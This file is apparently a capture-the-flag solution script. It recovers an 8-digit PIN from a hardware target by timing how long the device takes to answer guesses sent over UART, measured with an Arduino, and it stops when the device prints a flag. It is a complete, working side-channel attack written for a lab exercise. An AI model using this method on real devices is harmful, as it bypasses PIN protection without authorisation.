Newer
Older
12Sec_CTF_v1 / docs / 12_solution.py
root 13 days ago 10 KB solution writeups
#!/usr/bin/env python3
"""
=====================================================================
UART Timing Analysis PIN Discovery Script (configurable start)
=====================================================================
Performs timing-based side-channel analysis to discover an 8-digit PIN
via UART, using the Arduino I/O controller for synchronised monitoring.

This variant allows pre-setting a starting code (prefix) and the
starting position index so that discovery may resume part-way through.
Version: 1.3
=====================================================================
"""

import time
import serial
from arduinIO import ArduinoController

# ================================================================
# Configuration
# ================================================================

###### UART Configuration ######
SERIAL_PORT = '/dev/ttyUSB0'
BAUD_RATE = 1199
UART_NEWLINE = "\n"

###### Arduino I/O Configuration ######
ARDIO_PORT = "/dev/ttyACM0"
ARDIO_BAUDRATE = 115200
ARDIO_INPUT_PIN = 2

###### Analysis Parameters ######
PIN_LENGTH = 8
KEYSPACE = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
PAD_CHAR = 'A'
ATTEMPTS_PER_CANDIDATE = 1

# Optionally set a starting prefix and a starting position.
# START_CODE is the known prefix (string). It may be empty.
# START_POS is the zero-based index at which to begin discovery.
# Example: START_CODE = "253", START_POS = 3 will begin at position 4.
START_CODE = ""      # e.g. "253"
START_POS = 0        # zero-based index (0..PIN_LENGTH-1). Must equal len(START_CODE).

###### Delay Configuration (seconds) ######
INTER_ATTEMPT_DELAY = 1.5      # Delay between attempts of same candidate
SEND_SETTLE_DELAY = 0.5        # Delay after sending message before reading input
POSITION_SETTLE_DELAY = 0.05      # Delay after finishing one position
MAX_WAIT_MS = 800              # Maximum wait for input response
MAX_UPPER_BOUND_MS = 1000      # initial upper bound for valid durations (ms)

# ================================================================
# Helper Functions
# ================================================================

def log(msg: str, level: str = "INFO"):
    """Structured log output with level labels."""
    prefix = {
        "INFO": "\033[94m[INFO]\033[0m",
        "TEST": "\033[93m[TEST]\033[0m",
        "ATTEMPT": "\033[90m[ATTEMPT]\033[0m",
        "RESULT": "\033[92m[RESULT]\033[0m",
        "ERROR": "\033[91m[ERROR]\033[0m",
        "SUCCESS": "\033[96m[SUCCESS]\033[0m"
    }.get(level, "[LOG]")
    print(f"{prefix} {msg}")


def send_uart_message(ser, message: str):
    """Send full message to UART target."""
    if not message.endswith(UART_NEWLINE):
        message += UART_NEWLINE
    ser.write(message.encode("utf-8"))
    ser.flush()


def validate_start_settings():
    """Validate START_CODE and START_POS consistency and bounds."""
    if not isinstance(START_CODE, str):
        raise ValueError("START_CODE must be a string.")
    if not isinstance(START_POS, int):
        raise ValueError("START_POS must be an integer.")
    if len(START_CODE) != START_POS:
        raise ValueError("Length of START_CODE must equal START_POS.")
    if START_POS < 0 or START_POS > PIN_LENGTH:
        raise ValueError("START_POS out of valid range.")
    if len(START_CODE) > PIN_LENGTH:
        raise ValueError("START_CODE longer than PIN_LENGTH.")


# ================================================================
# PIN Discovery Logic
# ================================================================

def find_code(ser, arduino):
    """
    Discover the PIN by measuring time from send until LED (ARDIO_INPUT_PIN) goes LOW.

    Important: no UART reading occurs during the timed interval. UART is only
    drained before sending (to remove stale lines) and immediately after the
    timing measurement completes. This avoids introducing extra delay into
    the critical timing path.
    """

    validate_start_settings()
    log("Starting PIN discovery (timing with no mid-send UART checks)", "INFO")

    discovered = START_CODE
    start_pos = START_POS

    remaining_positions = PIN_LENGTH - start_pos
    if remaining_positions <= 0:
        log(f"No positions to discover. Current code: {discovered}", "INFO")
        return discovered

    total_candidates = len(KEYSPACE)
    total_attempts = remaining_positions * total_candidates * ATTEMPTS_PER_CANDIDATE
    eta_start = time.time()
    attempts_done = 0

    for pos in range(start_pos, PIN_LENGTH):
        human_pos = pos + 1
        log(f"Analysing position {human_pos}/{PIN_LENGTH}", "INFO")
        timings = {}

        # Upper bound grows with each identified position (relative index)
        relative_index = pos - start_pos
        upper_bound = MAX_UPPER_BOUND_MS + relative_index * 20

        for idx, candidate in enumerate(KEYSPACE):
            candidate_pin = discovered + candidate + (PAD_CHAR * (PIN_LENGTH - len(discovered) - 1))
            durations = []

            for attempt in range(ATTEMPTS_PER_CANDIDATE):
                # Best-effort non-blocking drain of stale UART lines BEFORE sending
                try:
                    while ser.in_waiting:
                        _ = ser.readline()  # discard
                except Exception:
                    pass

                # Clear any previous short event records on Arduino
                try:
                    arduino.watch_pin(ARDIO_INPUT_PIN, duration_ms=1)
                except Exception:
                    pass

                # Start timing immediately before send (critical interval begins)
                t_start = time.time()
                send_uart_message(ser, candidate_pin + UART_NEWLINE)

                # short settle after send (does not affect measurement start)
                time.sleep(SEND_SETTLE_DELAY)

                # Perform event-based capture (no UART reads here)
                dur_ms = 0
                try:
                    events = arduino.watch_pin(ARDIO_INPUT_PIN, duration_ms=MAX_WAIT_MS)
                except Exception:
                    events = []

                if events:
                    low_event = next((ev for ev in events if ev.get("state") == "LOW"), None)
                    if low_event:
                        dur_ms = low_event.get("duration_ms", 0)

                # Fallback blocking wait_if_no_event (still no UART reads)
                if dur_ms == 0:
                    try:
                        result = arduino.wait_for(ARDIO_INPUT_PIN, "LOW")
                        t_end = time.time()
                        if isinstance(result, dict):
                            dur_ms = result.get("duration_ms", int((t_end - t_start) * 1000))
                        else:
                            dur_ms = int((t_end - t_start) * 1000)
                    except Exception:
                        dur_ms = 0

                # Immediately after measurement, drain UART non-blocking and check for success
                try:
                    while ser.in_waiting:
                        line = ser.readline().decode(errors='ignore').strip()
                        if line and line.startswith("TS{"):
                            # Found success; append this candidate and return the discovered code
                            discovered += candidate
                            log(f"Device accepted code via UART: {line} -> {discovered}", "SUCCESS")
                            return discovered
                except Exception:
                    # ignore serial read errors and continue
                    pass

                # Only include durations that lie within the allowed window
                if 600 <= dur_ms <= upper_bound:
                    durations.append(dur_ms)

                # Update ETA (safe to compute outside critical interval)
                attempts_done += 1
                elapsed = time.time() - eta_start
                avg_time_per_attempt = (elapsed / attempts_done) if attempts_done else 0.0
                remaining_attempts = total_attempts - attempts_done
                eta_remaining = remaining_attempts * avg_time_per_attempt
                eta_min, eta_sec = divmod(int(eta_remaining), 60)

                # Overwrite attempt line
                print(f"\r\033[90m[ATTEMPT]\033[0m {candidate} attempt {attempt + 1}/{ATTEMPTS_PER_CANDIDATE} → {dur_ms} ms | ETA: {eta_min}m {eta_sec}s", end='', flush=True)

                time.sleep(INTER_ATTEMPT_DELAY)

            # newline after candidate block
            #print()

            # Compute average using only valid durations
            avg_duration = (sum(durations) / len(durations)) if durations else 0.0
            timings[candidate] = avg_duration
            print(f"\r\033[92m[RESULT]\033[0m Candidate '{candidate}' average LOW-delay: {avg_duration:.2f} ms", end='', flush=True)
            print()

        # Select best candidate (largest average); fallback to '0' if none valid
        if any(v > 0 for v in timings.values()):
            selected = max(timings, key=timings.get)
        else:
            selected = '0'

        discovered += selected
        log(f"Position {human_pos} selected: '{selected}' (avg {timings.get(selected, 0.0):.2f} ms)", "INFO")

        # Progress display
        print(f"\n    ┌───────────────────────────────┐")
        print(f"    │ Progress: {discovered:<8} │")
        print(f"    └───────────────────────────────┘\n")

        # Optional settle between positions; keep minimal if timing-sensitive
        if POSITION_SETTLE_DELAY:
            time.sleep(POSITION_SETTLE_DELAY)

    log(f"[SUCCESS] PIN discovery complete → {discovered}", "SUCCESS")
    return discovered



# ================================================================
# Main Execution
# ================================================================

def main():
    log("Initialising Arduino controller...", "INFO")
    arduino = ArduinoController(port=ARDIO_PORT, baudrate=ARDIO_BAUDRATE)
    arduino.connect()
    version = arduino.get_version()
    log(f"Connected to Arduino firmware {version}", "INFO")

    arduino.set_mode(ARDIO_INPUT_PIN, "INPUT")
    log(f"Configured Arduino input pin {ARDIO_INPUT_PIN}", "INFO")

    log(f"Connecting to UART target on {SERIAL_PORT} at {BAUD_RATE} baud...", "INFO")
    ser = serial.Serial(SERIAL_PORT, BAUD_RATE, timeout=1)
    log("UART connection established", "INFO")

    try:
        pin = find_code(ser, arduino)
        log(f"Discovered PIN: {pin}", "SUCCESS")
    except KeyboardInterrupt:
        log("Process interrupted by user", "ERROR")
    except Exception as e:
        log(f"Unexpected error: {e}", "ERROR")
    finally:
        ser.close()
        arduino.disconnect()
        log("Connections closed", "INFO")


if __name__ == "__main__":
    main()